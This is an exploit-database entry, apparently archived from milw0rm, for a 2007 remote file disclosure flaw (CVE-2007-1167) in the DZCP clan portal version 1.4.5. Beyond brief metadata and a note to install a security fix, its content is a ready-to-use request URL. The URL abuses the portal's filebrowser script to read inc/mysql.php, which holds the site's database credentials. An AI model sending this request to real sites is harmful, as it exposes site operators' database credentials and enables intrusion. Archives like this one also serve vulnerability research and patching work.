DZCP (deV!L_z Clanportal) 1.4.5 - Remote File Disclosure

Author: Kiba
type: webapps
platform: php
port: 
date_added: 2007-02-20 
date_updated:  
verified: 1 
codes: OSVDB-33372;CVE-2007-1167 
tags: 
aliases:  
screenshot_url:  
application_url: 

# DZCP (Devilz Clanportal) <= 1.4.5 Mysql Data viewable
# Found by: Kiba
# Solution: Install security Fix!
# Exploit:

http://[SITE]/[PATH]/inc/filebrowser/browser.php?file=inc/mysql.php

Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php

# milw0rm.com [2007-02-21]